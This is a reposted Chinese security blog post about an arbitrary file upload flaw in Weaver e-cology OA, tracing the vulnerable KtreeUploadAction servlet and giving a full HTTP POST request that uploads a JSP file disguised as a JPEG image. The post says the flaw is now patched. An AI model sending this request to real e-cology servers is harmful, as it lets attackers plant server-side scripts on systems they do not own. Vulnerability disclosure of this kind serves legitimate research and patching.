转自:HALO环带
一直也在用的一个0day。但由于泛微去年更新了一个非常恶心的补丁包,导致此漏洞废了。至于是什么补丁后续有空在给大家分析。
直接给出定位文件:
ecologyCLASSB~1comweaverformmodelappsktreeservletKtreeUploadAction.class
跟进uploadimage,看内部实现
继续跟踪upload方法
一览无余,无任何过滤操作,其实这里应该还需要跟进FileUploadFileNames(),但是也没必要,因为下面已经完成文件的写入
直接丢EXP:
POST /weaver/com.weaver.formmodel.apps.ktree.servlet.KtreeUploadAction?action=image HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: Secure; JSESSIONID=abc6xLBV7S2jvgm3CB50w; Secure; testBanCookie=testUpgrade-Insecure-Requests: 1Cache-Control: max-age=0Content-Type: multipart/form-data; boundary=--------1638451160Content-Length: 171----------1638451160Content-Disposition: form-data; name="test"; filename="test.jsp"Content-Type: image/jpeghelloword----------1638451160--
PS:漏洞已修复,遇到靠缘分。泛微法务别找我,只怪你问题太多。
如有侵权,请联系删除
推荐阅读
学习更多技术,关注我:
觉得文章不错给点个‘再看’吧
原文始发于微信公众号(编码安全研究):泛微e-cology任意文件上传(已修复)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论